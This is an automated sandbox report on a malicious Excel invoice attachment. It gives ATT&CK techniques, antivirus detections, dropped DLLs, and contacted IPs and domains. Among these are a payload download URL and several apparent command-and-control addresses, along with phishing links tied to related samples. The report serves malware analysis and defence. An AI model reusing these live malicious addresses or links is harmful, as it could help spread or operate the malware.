Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection112Masquerading11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery2Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery14Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
INV9698791470-20210111920647.xlsm30%VirustotalBrowse
INV9698791470-20210111920647.xlsm17%ReversingLabsScript-Macro.Trojan.Wacatac

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\deibsjhv.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip33%ReversingLabsWin32.Trojan.Wacatac
C:\Users\user\AppData\Local\Temp\deibsjhv.dll33%ReversingLabsWin32.Trojan.Wacatac

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
cdn.digicertcdn.com0%VirustotalBrowse
inmindppe.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://46.105.131.65/D0%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://80.86.91.27/0%Avira URL Cloudsafe
https://77.220.64.37/0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://46.105.131.65/0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://inmindppe.com/eb3kd1le.zip0%Avira URL Cloudsafe
https://80.86.91.27/h0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://5.100.228.233/0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cdn.digicertcdn.com
104.18.10.39
truefalseunknown
inmindppe.com
160.153.133.116
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://inmindppe.com/eb3kd1le.zipfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.windows.com/pctv.DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpfalse
    high
    https://46.105.131.65/Dregsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://investor.msn.comDWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpfalse
      high
      http://www.msnbc.com/news/ticker.txtDWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpfalse
        high
        http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpfalse
          high
          http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          https://80.86.91.27/regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://77.220.64.37/regsvr32.exe, 00000004.00000002.2382308141.00000000003F1000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=trueDWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oeDWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpfalse
            high
            https://46.105.131.65/regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckDWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmpfalse
              high
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.icra.org/vocabulary/.DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2382894388.0000000002180000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2234299675.00000000041C0000.00000002.00000001.sdmpfalse
                high
                https://80.86.91.27/hregsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://investor.msn.com/DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpfalse
                  high
                  http://www.%s.comPAregsvr32.exe, 00000004.00000002.2382894388.0000000002180000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2234299675.00000000041C0000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  low
                  http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpfalse
                    high
                    https://5.100.228.233/regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2382287592.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382544671.0000000001D80000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230070826.0000000002360000.00000002.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmpfalse
                      high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      5.100.228.233
                      unknownNetherlands
                      8315SENTIANLtrue
                      80.86.91.27
                      unknownGermany
                      8972GD-EMEA-DC-SXB1DEtrue
                      160.153.133.116
                      unknownUnited States
                      21501GODADDY-AMSDEfalse
                      46.105.131.65
                      unknownFrance
                      16276OVHFRtrue
                      77.220.64.37
                      unknownItaly
                      44160INTERNETONEInternetServicesProviderITtrue

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:338095
                      Start date:11.01.2021
                      Start time:16:51:14
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 0s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:INV9698791470-20210111920647.xlsm
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.expl.evad.winXLSM@9/21@1/5
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 1.5% (good quality ratio 1.5%)
                      • Quality average: 78%
                      • Quality standard deviation: 26.6%
                      HCA Information:
                      • Successful, ratio: 89%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .xlsm
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Close Viewer
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 93.184.221.240, 2.20.142.210, 2.20.142.209, 104.43.139.144, 104.18.10.39
                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, wu.azureedge.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, blobcollector.events.data.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:51:48API Interceptor1116x Sleep call for process: regsvr32.exe modified
                      16:52:03API Interceptor512x Sleep call for process: DWWIN.EXE modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      5.100.228.233hy9x6wzip.dllGet hashmaliciousBrowse
                        INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                          jufk0vrar.dllGet hashmaliciousBrowse
                            80.86.91.27hy9x6wzip.dllGet hashmaliciousBrowse
                              INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                jufk0vrar.dllGet hashmaliciousBrowse
                                  46.105.131.65hy9x6wzip.dllGet hashmaliciousBrowse
                                    INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                      jufk0vrar.dllGet hashmaliciousBrowse
                                        77.220.64.37hy9x6wzip.dllGet hashmaliciousBrowse
                                          INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                            jufk0vrar.dllGet hashmaliciousBrowse
                                              SecuriteInfo.com.Trojan.Dridex.735.5073.dllGet hashmaliciousBrowse
                                                1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                    1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                      1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                        1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                          1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Mal.EncPk-APV.3900.dllGet hashmaliciousBrowse
                                                              ygyq4p539.rar.dllGet hashmaliciousBrowse
                                                                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  cdn.digicertcdn.comSurfsharkSetup.exeGet hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  ASHLEY NAIDOO CV.docGet hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  RFQ.docGet hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3DGet hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3DGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3DGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3DGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3DGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3DGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3DGet hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  Vessel details.docGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  excel.xlsGet hashmaliciousBrowse
                                                                  • 104.18.11.39
                                                                  excel.xlsGet hashmaliciousBrowse
                                                                  • 104.18.10.39
                                                                  http://cloudz.pw/go?green=carrier 48gs-036060301 operation manualGet hashmaliciousBrowse
                                                                  • 104.18.10.39

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  GD-EMEA-DC-SXB1DEhy9x6wzip.dllGet hashmaliciousBrowse
                                                                  • 80.86.91.27
                                                                  INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                  • 80.86.91.27
                                                                  jufk0vrar.dllGet hashmaliciousBrowse
                                                                  • 80.86.91.27
                                                                  s3CRQNulKZ.exeGet hashmaliciousBrowse
                                                                  • 217.172.179.54
                                                                  DFR2154747.vbeGet hashmaliciousBrowse
                                                                  • 85.25.93.233
                                                                  r8a97.exeGet hashmaliciousBrowse
                                                                  • 62.75.168.106
